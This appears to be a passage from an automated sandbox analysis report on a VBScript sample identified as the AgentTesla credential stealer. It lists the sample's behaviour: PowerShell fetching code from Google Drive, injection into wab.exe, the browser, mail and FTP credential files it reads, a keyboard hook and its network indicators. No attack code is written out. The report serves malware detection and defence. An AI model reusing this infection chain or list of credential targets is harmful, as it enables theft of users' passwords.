Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000009.00000002.3297721319.00000000253F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3297721319.000000002541D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\FTP Navigator\Ftplist.txt Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000009.00000002.3297721319.00000000253F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000009.00000002.3297721319.00000000253F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3297721319.000000002541D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430125 Sample: TRANSPORT_INSTRUCTION_MR.vbs Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 39 mail.myhydropowered.com 2->39 41 ip-api.com 2->41 43 3 other IPs or domains 2->43 53 Multi AV Scanner detection for domain / URL 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for URL or domain 2->57 59 10 other signatures 2->59 11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 65 VBScript performs obfuscated calls to suspicious functions 11->65 67 Suspicious powershell command line found 11->67 69 Wscript starts Powershell (via cmd or directly) 11->69 71 3 other signatures 11->71 14 powershell.exe 14 19 11->14         started        18 WmiPrvSE.exe 11->18         started        process6 dnsIp7 49 drive.google.com 142.251.32.110, 443, 49706, 49716 GOOGLEUS United States 14->49 51 drive.usercontent.google.com 142.251.35.161, 443, 49707, 49717 GOOGLEUS United States 14->51 81 Suspicious powershell command line found 14->81 83 Very long command line found 14->83 85 Found suspicious powershell code related to unpacking or dynamic code loading 14->85 20 powershell.exe 17 14->20         started        23 conhost.exe 14->23         started        25 cmd.exe 1 14->25         started        signatures8 process9 signatures10 61 Writes to foreign memory regions 20->61 63 Found suspicious powershell code related to unpacking or dynamic code loading 20->63 27 wab.exe 17 9 20->27         started        31 cmd.exe 1 20->31         started        process11 dnsIp12 45 ip-api.com 208.95.112.1, 49719, 80 TUT-ASUS United States 27->45 47 api.ipify.org 104.26.13.205, 443, 49718 CLOUDFLARENETUS United States 27->47 73 Tries to steal Mail credentials (via file / registry access) 27->73 75 Tries to harvest and steal ftp login credentials 27->75 77 Tries to harvest and steal browser information (history, passwords, etc) 27->77 79 Installs a global keyboard hook 27->79 33 cmd.exe 1 27->33         started        signatures13 process14 process15 35 conhost.exe 33->35         started        37 reg.exe 1 1 33->37         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.251.35.161
 drive.usercontent.google.com United States
15169 GOOGLEUS false
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS false
142.251.32.110
 drive.google.com United States
15169 GOOGLEUS false
104.26.13.205
 api.ipify.org United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.210.172 true
drive.google.com 142.251.32.110 true
drive.usercontent.google.com 142.251.35.161 true
api.ipify.org 104.26.13.205 true
ip-api.com 208.95.112.1 true
mail.myhydropowered.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
    		high
    http://ip-api.com/line/?fields=hosting false
      		high